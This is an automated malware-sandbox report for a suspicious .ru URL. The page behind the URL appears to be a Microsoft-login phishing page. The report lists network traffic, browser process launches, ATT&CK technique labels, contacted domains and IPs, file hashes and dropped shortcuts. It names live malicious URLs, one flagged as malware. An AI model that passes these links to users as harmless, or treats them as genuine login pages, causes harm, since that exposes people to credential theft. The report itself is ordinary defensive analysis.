Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:20:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtRgaigRntOdmFOFRSYz%2FKEAFeIqzMNTOUkCjVxFEFJgP5X9FTT7UqH0bLCOY1Zk%2B%2B8%2B%2BOqj7N02ZMr9stlxUDsYEr%2FZHi1ZjfRsLLPnhhlzsN%2FJQgMU1VlfQTd4gA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5048&min_rtt=5005&rtt_var=1487&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2237&delivery_rate=542269&cwnd=228&unsent_bytes=0&cid=d01d45ba3f4da604&ts=154&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 902caf8afd0ac32e-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1475&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1898&delivery_rate=1959731&cwnd=178&unsent_bytes=0&cid=fade22bf33827ac2&ts=3902&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 95ee8bcc-1631-4a79-a238-d48ee0feaf00x-ms-ests-server: 2.1.19870.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-K-g14_FQms7AXCo0Y_q_ZA' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllX-XSS-Protection: 0Date: Thu, 16 Jan 2025 08:20:39 GMTConnection: closeContent-Length: 0
Source: chromecache_96.2.dr, chromecache_88.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_96.2.dr, chromecache_88.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: classification engineClassification label: mal56.win@20/74@36/16
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1972,i,3349844353704011253,6770722091847730992,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://56.hanagibenewe.ru/Y7MD/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1972,i,3349844353704011253,6770722091847730992,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://56.hanagibenewe.ru/Y7MD/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://56.hanagibenewe.ru/favicon.ico0%Avira URL Cloudsafe
https://oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru/yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www.tm.ak.prd.aadg.trafficmanager.net
20.190.160.14
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      e329293.dscd.akamaiedge.net
      2.23.209.34
      truefalse
        unknown
        b-0004.b-msedge.net
        13.107.6.156
        truefalse
          high
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            s-part-0017.t-0009.fb-t-msedge.net
            13.107.253.45
            truefalse
              high
              a1894.dscb.akamai.net
              2.18.64.215
              truefalse
                high
                code.jquery.com
                151.101.66.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      high
                      56.hanagibenewe.ru
                      104.21.96.1
                      truetrue
                        unknown
                        www.google.com
                        142.250.185.68
                        truefalse
                          high
                          oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru
                          104.21.16.1
                          truefalse
                            unknown
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              identity.nel.measure.office.net
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  login.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://56.hanagibenewe.ru/Y7MD/true
                                      unknown
                                      https://login.microsoftonline.com/false
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                          high
                                          https://login.microsoftonline.com/common/GetCredentialType?mkt=en-USfalse
                                            high
                                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/false
                                                high
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  high
                                                  https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2false
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902caf840eaa7ce8&lang=autofalse
                                                      high
                                                      https://login.microsoftonline.com/favicon.icofalse
                                                        high
                                                        https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                          high
                                                          https://56.hanagibenewe.ru/favicon.icofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4cfalse
                                                            high
                                                            https://www.office.com/loginfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902caf840eaa7ce8/1737015620919/TS7ZMPQmxY7bcfQfalse
                                                                high
                                                                https://a.nel.cloudflare.com/report/v4?s=GtRgaigRntOdmFOFRSYz%2FKEAFeIqzMNTOUkCjVxFEFJgP5X9FTT7UqH0bLCOY1Zk%2B%2B8%2B%2BOqj7N02ZMr9stlxUDsYEr%2FZHi1ZjfRsLLPnhhlzsN%2FJQgMU1VlfQTd4gA%3D%3Dfalse
                                                                  high
                                                                  https://oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru/yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZUfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/902caf840eaa7ce8/1737015620917/06803e07f083093b506a25e32cdcc8bb25dfdadec1b4ca42befeb10fcc321d4d/ZZbdEoB7MOUJd5Hfalse
                                                                    high
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://login.microsoftonline.comchromecache_96.2.dr, chromecache_88.2.drfalse
                                                                      high
                                                                      https://login.windows-ppe.netchromecache_96.2.dr, chromecache_88.2.drfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        13.107.6.156
                                                                        b-0004.b-msedge.netUnited States
                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        104.18.94.41
                                                                        challenges.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        20.190.160.14
                                                                        www.tm.ak.prd.aadg.trafficmanager.netUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        104.21.112.1
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.21.96.1
                                                                        56.hanagibenewe.ruUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        151.101.66.137
                                                                        code.jquery.comUnited States
                                                                        54113FASTLYUSfalse
                                                                        35.190.80.1
                                                                        a.nel.cloudflare.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.17.24.14
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.250.185.68
                                                                        www.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.21.16.1
                                                                        oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ruUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.18.95.41
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        151.101.2.137
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        239.255.255.250
                                                                        unknownReserved
                                                                        unknownunknownfalse
                                                                        104.17.25.14
                                                                        cdnjs.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        2.18.64.215
                                                                        a1894.dscb.akamai.netEuropean Union
                                                                        6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                        IP
                                                                        192.168.2.5
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1592548
                                                                        Start date and time:2025-01-16 09:19:15 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 14s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:browseurl.jbs
                                                                        Sample URL:https://56.hanagibenewe.ru/Y7MD/
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:7
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal56.win@20/74@36/16
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.174, 108.177.15.84, 142.250.185.142, 142.250.184.206, 199.232.210.172, 2.23.77.188, 142.250.186.46, 142.250.186.78, 20.190.160.20, 40.126.32.134, 20.190.160.22, 40.126.32.76, 40.126.32.72, 40.126.32.138, 40.126.32.74, 40.126.32.68, 40.126.31.71, 20.190.159.68, 40.126.31.73, 40.126.31.69, 20.190.159.75, 20.190.159.64, 20.190.159.4, 20.190.159.2, 142.250.185.202, 142.250.185.138, 142.250.184.202, 142.250.186.42, 216.58.206.74, 142.250.186.74, 216.58.212.138, 142.250.181.234, 142.250.185.170, 142.250.186.138, 142.250.186.106, 172.217.18.10, 216.58.206.42, 142.250.74.202, 142.250.185.234, 142.250.186.170, 51.116.253.168, 142.250.185.206, 172.217.16.206, 52.178.17.3, 142.250.185.163, 142.250.181.238, 184.28.90.27, 172.202.163.200, 13.107.246.45, 13.107.253.45
                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.aadcdn.msftauth.trafficmanager.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, onedscolprdgwc01.germanywestcentral.cloudapp.azure.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, www.tm.aadcdn.msftauth.akadns.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, onedscolprdweu05.westeurope.cloudapp.azure.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net,
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: https://56.hanagibenewe.ru/Y7MD/
                                                                        No simulations
                                                                        No context
                                                                        No context
                                                                        No context
                                                                        No context
                                                                        No context
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 07:20:11 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.9802775184799297
                                                                        Encrypted:false
                                                                        SSDEEP:48:8nidST+9sjHLidAKZdA19ehwiZUklqehKlxy+3:8nDWsprxy
                                                                        MD5:D001A5958070C2C37F795AE8C8BF30ED
                                                                        SHA1:2FF66BB57980FED939933F71021256A6E145E980
                                                                        SHA-256:FAAB1121391955AA0CBA85B6B577E58B8523C6C2EACF80DCAE9852E3F2E84DDF
                                                                        SHA-512:1AE1CDE10F72E7D24021DCDF0AD45A756D5092EFF37AD6A39A235C4094A5295B308789D73D7977CB5D49B3BB4CAD704F3B464D03C4E1FFC0953E023A387442C6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L..................F.@.. ...$+.,.....xDv.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z.B...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 07:20:11 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2679
                                                                        Entropy (8bit):3.996946734497779
                                                                        Encrypted:false
                                                                        SSDEEP:48:8tidST+9sjHLidAKZdA1weh/iZUkAQkqehZlxy+2:8tDWs79Q4xy
                                                                        MD5:2FAAE1985ACF7D080D96EB15F68B7E57
                                                                        SHA1:1782A4E0B0A89FD32B7E3830150287AF40C2B41C
                                                                        SHA-256:F2AB8C49F08E726020ACAEF9FE5A8B0AA5161425D450A6411BA5448EFB6B9C34
                                                                        SHA-512:97396C7BA2A85A51D51AE7582D3C451D0FCF7E5BA2313B3E4AD4D2AEA6BD36E5CFBAF1320B7B54BD702D91370D258400E7E6B3DF22A98F978024FCCE8C71FD84
                                                                        Malicious:false
                                                                        Reputation:low
